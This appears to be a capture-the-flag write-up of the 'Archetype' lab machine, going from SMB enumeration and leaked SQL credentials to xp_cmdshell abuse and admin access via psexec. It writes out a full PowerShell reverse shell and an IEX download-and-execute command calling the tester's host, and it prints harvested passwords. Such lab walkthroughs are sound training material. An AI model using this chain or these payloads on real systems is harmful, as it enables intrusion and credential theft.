Category: Machines
Difficulty: Easy
Description: -
Target Enumeration
We have this ip: 10.10.10.27.
The first thing that we are going to do is to scan that ip in order to see which ports are open:
$ nmap -p- -sC -sV 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.045s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-11T11:08:50
|_Not valid after: 2051-06-11T11:08:50
|_ssl-date: 2021-06-11T11:13:13+00:00; +18m21s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h42m20s, deviation: 3h07m51s, median: 18m19s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-11T04:13:05-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-11T11:13:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
We can see that there are a few services activated:
- Microsoft smb server on port 445
- Microsoft sql server on port 1433
First lets see if we can access the smb server anonimously to see which shares are available:
$ smbclient -N -L \\\\10.10.10.27\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Apart from ADMIN$, C$ and IPC$ which are the defaults, we have a share called backups. Lets see if we can access it without the password:
$ smbclient -N \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 13:20:57 2020
.. D 0 Mon Jan 20 13:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 13:23:02 2020
10328063 blocks of size 4096. 8249512 blocks available
smb: \> get prod.dtsConfig
Ok, so we can. Inside this share there is a file called prod.dtsConfig. After downloading it here is its content:
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Spawn a Shell
It is a configuration file for the Microsoft Sql server, and contains the credential to access it. So lets do it (I used mssqlclient.py script from Impacket):
$ mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
The credentials are up to date, nice! Now we need to know if our user has sysadmin privileges (which is the highest privilege level in a sql server), so we can open a reverse shell:
SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')
-----------
1
Ok, so we can use the command sp_configure to enable the command xp_cmdshell that will let us run shell commands:
SQL> EXEC sp_configure "Show advanced options", 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> EXEC sp_configure "xp_cmdshell", 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
Ok now that we can execute shell command we have to open a real shell. In order to do that we have to:
- listen to a port in our machine
- write a powershell reverse shell
- start an http server to serve the file containing the reverse shell
- download and execute our powershell code from the sql server
In order to complete the point 1 we only have to start a netcat listener on a port with nc -lvnp 8888.
This is the powershell code of the point 2 that I saved in the shell.ps1 file:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.107",8888)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
Next we have to start an http server to serve this file. This can be easily achieved running this command inside the directory of the file that we want to share:
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Finally we have to download and execute our reverse shell code in the sql server. This can be done with this command:
SQL> xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.107/shell.ps1\");"
And in the netcat listener:
Connection received on 10.10.10.27 49680
> whoami
archetype\sql_svc
Privilege Escalation
Searching for a while on Google i found this article that lists some common checks to do on a Windows machine, and checking the powershell history I found this:
> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
So this user ran those command.. interesting. Searching what the net.exe executable does I found this:
Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. – Microsoft Docs
Ok so it assign T to the shared resource, which is \\Archetype\backups, and connects to it with the username administrator and password MEGACORP_4dm1n!!.
Now we can login as administrator (I used another Impacket’s script called psexec.py):
$ psexec.py administrator@10.10.10.27
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file tmtqEIBa.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service piNd on 10.10.10.27.....
[*] Starting service piNd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system